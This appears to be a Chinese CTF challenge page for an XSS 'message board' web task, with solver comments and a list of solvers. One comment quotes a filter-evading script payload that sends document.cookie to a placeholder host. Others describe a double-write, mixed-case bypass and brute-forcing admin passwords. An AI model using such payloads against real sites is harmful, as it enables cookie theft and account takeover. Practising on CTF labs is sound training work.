留言板1WEB 未解决

分数: 20 金币: 3
题目作者: harry
一  血: 18256197318
一血奖励: 5金币
解  决: 143
提  示: 需要xss平台接收flag
描  述:
flag{}
评论
Jesen 4天前

2025年3月17日最新验证,本题获取flag没有问题,请检查是不是之前的payload没有闭合从而影响了后续js代码的正常加载

回复 0

Rannnn 4天前

换了四个XSS平台和自己搭的flask应用,连请求都收不到啊!!!

回复 0

ipconfig2023 27天前

题目有问题,希望修复一下,换了几个平台都收不到cookie,在自己服务器上运行的flask应用,收不到来自题目服务器的请求<scsCRiPtript>location.href="http://xx:8081/?flag_cookie="+document.cookie</scsCRiPtript>

回复 0

feifeifei1212 2月前

xss平台收不到

回复 0

燃燃然燃 3月前

自定义代码把XSS平台提供的图片https改成http有返回,但是看不到cookie。题目其实就是双写+大小写+空格绕过,对照WP复现XSS平台也没有回显,但是把同样的代码插入runoob的在线实例有回显,大概是环境有问题。

回复 0

我是CTF大王 5月前

这个题 爆破了十几万条弱密码 狗屁没有,肯定是长密码,怎么下一步

回复 0

我是CTF大王 5月前

没登录上去,拿cookie干鸡毛

回复 0

我是CTF大王 5月前

跟上个题目一样,都要登录admin才能拿到cookie,但是账密又改了,怎么获取admin密码???

回复 0

ailx10 5月前

很简单呀,https://zhuanlan.zhihu.com/p/839767477

回复 1

MaAp1e 5月前

退钱,XSS平台根本接收不到。

回复 1

WriteUp

image
小蔡

5 金币

评分(3)

解题动态

tingsi464 攻破了该题 4天前
wechai 攻破了该题 14天前
李师傅 攻破了该题 1月前
happyfmy 攻破了该题 1月前
tfios 攻破了该题 1月前
CTFKnight 攻破了该题 1月前
yanzhenfeng 攻破了该题 1月前
Ktcc5 攻破了该题 2月前
vicleet 攻破了该题 2月前
派大星CTF 攻破了该题 2月前
a1104048658 攻破了该题 3月前
buggy 攻破了该题 3月前
blacklotus0 攻破了该题 3月前
distiny 攻破了该题 4月前
modeng 攻破了该题 4月前
minshenyao 攻破了该题 4月前
vnuesa 攻破了该题 5月前
jugmid 攻破了该题 5月前
ailx10 攻破了该题 5月前
wangjf 攻破了该题 6月前
问题反馈